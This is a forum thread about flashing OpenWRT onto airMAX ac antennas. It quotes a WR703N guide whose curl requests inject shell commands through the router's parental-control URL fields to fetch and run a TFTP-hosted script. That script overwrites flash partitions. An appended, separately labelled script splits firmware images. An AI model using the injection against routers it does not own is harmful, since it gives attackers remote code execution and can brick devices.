airMAX ac with OpenWRT now possible

Hi!

With this trick it is possible to flash OpenWRT onto more recent airMAX ac hardware as well: General, NBE-5AC, LBE-5AC,

This gets around the limitation that airMAX ac antennas acting as a station can only attach to others of the same kind.

I haven't tested extensively yet how the performance compares with the proprietary firmware, but we'll see.

It would also be interesting to see whether the 2.4GHz management Wi-Fi on the Gen2 antennas can be put to sensible use.

Regards,
Daniel

2 Likes

But that only works if you flash openwrt onto it? With the original firmware would be cool …

Cool - just for the sake of completeness, here is the post by psyborg55:

few days ago i got Litebeam 5AC 23 Gen2 with WA.v8.5.7.38314.180628.1036, patching ubntbox did not work, downgrading to WA.v8.5.0.36727.180118.1314 was useless as device remained inaccessible.

luckily there is a crack in airos8 upgrade procedure that allows for flash manipulation without opening device:

log in to ssh and start to update same firmware that is already on device (in my case 8.5.7):

fwupdate.real -m /tmp/WA.v8.5.7.38314.180628.1036.bin -d

during the process abort the upgrade (sometime when it reaches checking of mtd3) by pressing Ctrl+C

this way we let the airos upgrade do the hard work for us by unlocking mtd partitions :)

after that flash your sysupgrade image to /dev/mtdblock2 and /dev/mtdblock3. it is needed to split sysupgrade image prior to that into chunks that will fit these partitions, see this great article by bugblue on how to do that: https://pastebin.com/0wzMthfr

unplug and replug power to device and it boots openwrt

i did waste several hours with this since i was trying factory image at first, then remembered sysupgrade must be used

And here is the content of the pastebin link (in case the link/paste gets removed):

Upgrade WR703N V 1.17.1 to openwrt

Upgrade your new WR703N V1.17.1 to openwrt.

WARNING: THIS CAN BRICK YOUR DEVICE. DO NOT RELY ON ANY OF THIS INFORMATION.

These are just hints how I did it.

If you have no experience with wr703n's. Just buy a MR3020.

You'll need:

* A FTP server (in my case 192.168.1.9, I advise to use the same IP or understand what the hell you're doing)
* An unix or mac workstation with curl (can be the same box)
* A general knowledge of unix commands.
* An openwrt image. I make my own but stock 12.09 might work.
* A binary busybox for mips static compiled.

The general idea:

* Put a script on your tp-link wr703n
* Put a better busybox on your tp-link wr703n
* Trick the wr703n into executing some commands to run this script.

The script:

* get the first and second part of the image from tftp
* flash the first part of the image (1024k) to the mtd partition named kernel
* flash the rest of the image (2819k) to the mtd partition named rootfs
* reboot the box with openwrt on it.

First setup the tftp server and put the following files there:

=== file aa cut from here ======

    cd /tmp
    tftp -gl i1 192.168.1.9
    tftp -gl i2 192.168.1.9
    tftp -gl busybox 192.168.1.9
    chmod 755 busybox
    ./busybox dd if=i1 of=/dev/mtdblock1 conv=fsync
    ./busybox dd if=i2 of=/dev/mtdblock2 conv=fsync
    ./busybox reboot -f
    echo blaaat

=== /file aa cut to here =======

Put the rest also there:

* busybox
* openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin

Cut the openwrt image in 2 parts. (Yes these commands):

These commands can take a while since I had no interest in calculating a better blocksize.

    dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i1 bs=1 count=1048576
    dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i2 bs=1 skip=1048576

now there are 4 files in your TFTP directory: aa, busybox, i1, i2

Now let's take a router and have it set to the factory settings.

Run these commands on your workstation.

    # !!DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).!!
    # First it wants a password set, let's do that. (the password is admin42 after this).
    curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true' 'http://192.168.1.1/'

    # Secondly it wants to have parental control enabled (probably the once in a lifetime opportunity to use this).
    curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1'

    # That being done, now all we need is to just simply exploit the router.
    # readable it does:
    # cd /tmp ; tftp -gl aa 192.168.1.9; sh aa
    # DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).
    curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.1.9;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6'
    # DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).

Just wait until it starts to blink, then openwrt is loading. Depending on your image you can reach it on its mac address.

If you have no experience with wr703n's. Just buy a MR3020.
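
Added example, not part of the forum posts or the quoted paste: both psyborg55's procedure and the paste split the image into per-partition chunks before writing them to raw flash, where a wrong split bricks the device. This sketch splits at a byte boundary without `bs=1` and checks that the parts rejoin to the original before anything is flashed. The helper name `split_image` and the optional size limit are assumptions, and real partition sizes have to be read from the device itself (for example from /proc/mtd).

```shell
#!/bin/sh
# Added example (not from the thread): split a firmware image at a byte
# boundary and verify the parts before anything is written to flash.
# Usage: split_image IMAGE FIRST_SIZE OUT1 OUT2 [SECOND_MAX]
#   FIRST_SIZE  bytes for the first partition (1048576 in the quoted paste)
#   SECOND_MAX  optional size limit of the second partition in bytes
# split_image is a hypothetical helper name; take real partition sizes
# from the device itself (e.g. /proc/mtd), not from this example.

size_of() { wc -c < "$1" | tr -d ' '; }

split_image() {
    img=$1; first=$2; out1=$3; out2=$4; second_max=${5:-0}
    [ -r "$img" ] || { echo "cannot read $img" >&2; return 1; }
    total=$(size_of "$img")
    # An image that fits entirely into the first partition leaves nothing
    # for the second one; treat that as an error instead of guessing.
    if [ "$total" -le "$first" ]; then
        echo "image ($total bytes) is not larger than first part ($first)" >&2
        return 1
    fi
    rest=$((total - first))
    if [ "$second_max" -gt 0 ] && [ "$rest" -gt "$second_max" ]; then
        echo "second part ($rest bytes) exceeds partition ($second_max)" >&2
        return 1
    fi
    # head/tail copy in large blocks, so this is fast where dd bs=1 is slow.
    head -c "$first" "$img" > "$out1" || return 1
    tail -c "+$((first + 1))" "$img" > "$out2" || return 1
    # Integrity check: sizes must match and the parts must rejoin exactly.
    if [ "$(size_of "$out1")" -ne "$first" ] ||
       [ "$(size_of "$out2")" -ne "$rest" ] ||
       ! cat "$out1" "$out2" | cmp -s - "$img"; then
        echo "split verification failed, removing parts" >&2
        rm -f "$out1" "$out2"
        return 1
    fi
    echo "$first $rest"
}

# Run as a script only when all four mandatory arguments are given.
[ "$#" -lt 4 ] || split_image "$@"
```

On success the function prints the byte sizes of both parts; any failure leaves no partial output files behind from the verification step.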